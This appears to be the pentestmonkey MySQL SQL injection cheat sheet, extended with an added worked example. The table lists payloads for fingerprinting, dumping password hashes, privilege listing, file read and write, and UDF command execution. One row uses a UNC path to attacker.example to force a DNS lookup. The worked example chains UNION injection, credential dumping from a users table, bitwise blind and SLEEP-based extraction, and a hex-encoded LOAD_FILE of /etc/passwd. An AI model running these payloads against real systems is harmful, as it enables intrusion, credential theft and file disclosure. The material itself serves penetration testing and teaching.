MySQL SQL Injection Cheat Sheet

Entries marked "priv" need elevated privileges (typically access to the mysql system database, FILE, or SUPER). MySQL accepts three comment styles; the "-- " form needs a space after the dashes, which is why injected payloads usually end in "-- -" so the space survives trimming.

| Description | Query / Notes |
| --- | --- |
| Version | SELECT @@version; |
| Comments | SELECT 1; #comment |
|  | SELECT 1; -- comment (a space after -- is mandatory) |
| Current User | SELECT user(); (connecting user) |
|  | SELECT current_user(); (account the privileges were actually checked against; can differ from user()) |
| List Users | SELECT user FROM mysql.user; -- priv |
| List Password Hashes | SELECT host, user, password FROM mysql.user; -- priv, MySQL < 5.7 |
|  | SELECT host, user, authentication_string FROM mysql.user; -- priv, MySQL >= 5.7 (the password column was removed) |
| Password Cracker | John the Ripper will crack MySQL password hashes (the 41-character "*..." mysql_native_password hashes; MySQL 8 defaults to caching_sha2_password, which is much slower to attack). |
| List Privileges | SELECT grantee, privilege_type, is_grantable FROM information_schema.user_privileges; -- list user privs |
|  | SELECT host, user, Select_priv, Insert_priv, Update_priv, Delete_priv, Create_priv, Drop_priv, Reload_priv, Shutdown_priv, Process_priv, File_priv, Grant_priv, References_priv, Index_priv, Alter_priv, Show_db_priv, Super_priv, Create_tmp_table_priv, Lock_tables_priv, Execute_priv, Repl_slave_priv, Repl_client_priv FROM mysql.user; -- priv, list user privs |
|  | SELECT grantee, table_schema, privilege_type FROM information_schema.schema_privileges; -- list privs on databases (schemas) |
|  | SELECT table_schema, table_name, column_name, privilege_type FROM information_schema.column_privileges; -- list privs on columns |
| List DBA Accounts | SELECT grantee, privilege_type, is_grantable FROM information_schema.user_privileges WHERE privilege_type = 'SUPER'; |
|  | SELECT host, user FROM mysql.user WHERE Super_priv = 'Y'; # priv |
| Current Database | SELECT database(); |
| List Databases | SELECT schema_name FROM information_schema.schemata; -- for MySQL >= 5.0 |
|  | SELECT DISTINCT(db) FROM mysql.db; -- priv |
| List Columns | SELECT table_schema, table_name, column_name FROM information_schema.columns WHERE table_schema != 'mysql' AND table_schema != 'information_schema'; |
| List Tables | SELECT table_schema, table_name FROM information_schema.tables WHERE table_schema != 'mysql' AND table_schema != 'information_schema'; |
| Find Tables From Column Name | SELECT table_schema, table_name FROM information_schema.columns WHERE column_name = 'username'; -- find tables which have a column called 'username' |
| Select Nth Row | SELECT host, user FROM mysql.user ORDER BY host LIMIT 1 OFFSET 0; # rows numbered from 0 |
|  | SELECT host, user FROM mysql.user ORDER BY host LIMIT 1 OFFSET 1; # second row |
| Select Nth Char | SELECT substr('abcd', 3, 1); # returns c |
| Bitwise AND | SELECT 6 & 2; # returns 2 |
|  | SELECT 6 & 1; # returns 0 |
| ASCII Value -> Char | SELECT char(65); # returns A |
| Char -> ASCII Value | SELECT ascii('A'); # returns 65 |
| Casting | SELECT cast('1' AS unsigned integer); |
|  | SELECT cast('123' AS char); |
| String Concatenation | SELECT CONCAT('A','B'); # returns AB |
|  | SELECT CONCAT('A','B','C'); # returns ABC |
| If Statement | SELECT if(1=1,'foo','bar'); -- returns 'foo' |
| Case Statement | SELECT CASE WHEN (1=1) THEN 'A' ELSE 'B' END; # returns A |
| Avoiding Quotes | SELECT 0x414243; # returns ABC (a hex literal is usable wherever a string is expected) |
| Time Delay | SELECT BENCHMARK(1000000,MD5('A')); # CPU-bound; delay depends on server speed |
|  | SELECT SLEEP(5); # >= 5.0.12 |
| Make DNS Requests | Not possible from plain SQL on a Linux server. Note beyond the original sheet: on a Windows server with the FILE privilege, LOAD_FILE('\\\\attacker.example\\share\\x') (a UNC path) makes mysqld resolve the hostname before the read fails. |
| Command Execution | If mysqld (< 5.0) is running as root AND you compromise a DBA account, you can execute OS commands by uploading a shared object file into /usr/lib (or similar). The .so file should contain a User Defined Function (UDF). raptor_udf.c explains exactly how to go about this. Remember to compile for the target architecture, which may or may not be the same as your attack platform (check @@version_compile_os and @@version_compile_machine). From 5.0.67 onward the library must be placed in the directory named by @@plugin_dir, and writing it there with SELECT ... INTO DUMPFILE is subject to @@secure_file_priv. |
| Local File Access | ...' UNION ALL SELECT LOAD_FILE('/etc/passwd') -- priv (FILE), can only read files readable by the mysqld OS user; returns NULL rather than an error on failure; blocked or confined by @@secure_file_priv |
|  | SELECT * FROM mytable INTO DUMPFILE '/tmp/somefile'; -- priv (FILE), write to filesystem; the target file must not already exist and is created as the mysqld OS user |
| Hostname, IP Address | SELECT @@hostname; |
| Create Users | CREATE USER test1 IDENTIFIED BY 'pass1'; -- priv |
| Delete Users | DROP USER test1; -- priv |
| Make User DBA | GRANT ALL PRIVILEGES ON *.* TO test1@'%'; -- priv |
| Location of DB files | SELECT @@datadir; |
| Default/System Databases | information_schema (>= MySQL 5.0), mysql |
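The rows above are building blocks; what a tester actually needs is how they chain together. The following is an added worked example, not part of the pentestmonkey sheet, that strings the information_schema enumeration, the UNION/CONCAT extraction, the hex-literal quote avoidance, the substr/ascii/bitwise-AND blind technique, the SLEEP time delay, and the file-access checks into one session. The vulnerable query (SELECT name, price FROM products WHERE id = ...), the two-column layout, and the app.users table with username and password columns are all assumptions made for illustration.

```sql
-- Added worked example (not part of the pentestmonkey sheet).
-- Assumed vulnerable query (hypothetical):
--   SELECT name, price FROM products WHERE id = <user input>
-- so every injected UNION must produce exactly two columns.
-- app.users (username, password) is an assumed table used for illustration.

-- 1. Confirm the column count: ORDER BY 3 errors out, ORDER BY 2 does not.
--    Injected: 1 ORDER BY 2-- -
SELECT name, price FROM products WHERE id = 1 ORDER BY 2;

-- 2. Fingerprint in one row. 0x7c is '|', so the payload needs no quotes.
--    Injected: -1 UNION ALL SELECT CONCAT_WS(0x7c,@@version,user(),database(),@@datadir),NULL-- -
SELECT name, price FROM products WHERE id = -1
UNION ALL SELECT CONCAT_WS(0x7c, @@version, user(), database(), @@datadir), NULL;

-- 3. Enumerate tables, then columns, through information_schema (MySQL >= 5.0).
--    GROUP_CONCAT packs many rows into the single row the page renders;
--    output is cut at group_concat_max_len (1024 bytes by default).
SELECT name, price FROM products WHERE id = -1
UNION ALL SELECT GROUP_CONCAT(table_schema, 0x2e, table_name SEPARATOR 0x2c), NULL
  FROM information_schema.tables
 WHERE table_schema NOT IN ('mysql', 'information_schema', 'performance_schema', 'sys');

SELECT name, price FROM products WHERE id = -1
UNION ALL SELECT GROUP_CONCAT(column_name SEPARATOR 0x2c), NULL
  FROM information_schema.columns
 WHERE table_schema = 0x617070 AND table_name = 0x7573657273;  -- 'app', 'users' as hex

-- 4. Dump the interesting columns, one "username:password" pair per line.
SELECT name, price FROM products WHERE id = -1
UNION ALL SELECT GROUP_CONCAT(username, 0x3a, password SEPARATOR 0x0a), NULL FROM app.users;

-- 5. Boolean-blind extraction when UNION output is not reflected.
--    Each request tests one bit of one character (8 requests per character,
--    no character-set guessing). Here: bit 6 (value 64) of the first character
--    of the first username, first row selected with LIMIT 1 OFFSET 0.
--    Injected: 1 AND (ASCII(SUBSTR((SELECT username FROM app.users LIMIT 1 OFFSET 0),1,1))&64)>0-- -
SELECT name, price FROM products WHERE id = 1
   AND (ASCII(SUBSTR((SELECT username FROM app.users LIMIT 1 OFFSET 0), 1, 1)) & 64) > 0;

-- 6. Time-based variant for a fully blind sink (SLEEP needs MySQL >= 5.0.12).
--    The response is delayed about 3 s only when the tested bit is set;
--    the row is never returned either way, so timing is the only signal.
SELECT name, price FROM products WHERE id = 1
   AND IF((ASCII(SUBSTR((SELECT username FROM app.users LIMIT 1 OFFSET 0), 1, 1)) & 64) > 0,
          SLEEP(3), 0);

-- 7. Preflight before LOAD_FILE / INTO DUMPFILE / UDF work.
--    secure_file_priv: '' = unrestricted, a path = confined to that directory,
--    NULL = file operations disabled. A UDF library must sit in plugin_dir on
--    modern servers, and the account needs FILE_priv for both directions.
SELECT @@secure_file_priv, @@plugin_dir, @@version_compile_os, @@version_compile_machine;
SELECT File_priv, Super_priv FROM mysql.user
 WHERE user = SUBSTRING_INDEX(user(), '@', 1);  -- priv

-- LOAD_FILE returns NULL (not an error) when the file is unreadable or blocked.
-- The path is a hex literal to avoid quotes: 0x2f6574632f706173737764 = '/etc/passwd'.
SELECT name, price FROM products WHERE id = -1
UNION ALL SELECT LOAD_FILE(0x2f6574632f706173737764), NULL;
```

Steps 5 and 6 are written for one bit of one character; in practice the position argument to SUBSTR, the OFFSET, and the bit mask (1, 2, 4, ..., 128) are iterated by a script, and a NULL result from step 7's @@secure_file_priv is the signal to stop planning file-based attacks on that host.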
Original link:
http://pentestmonkey.net/cheat-sheet/sql-injection/mysql-sql-injection-cheat-sheet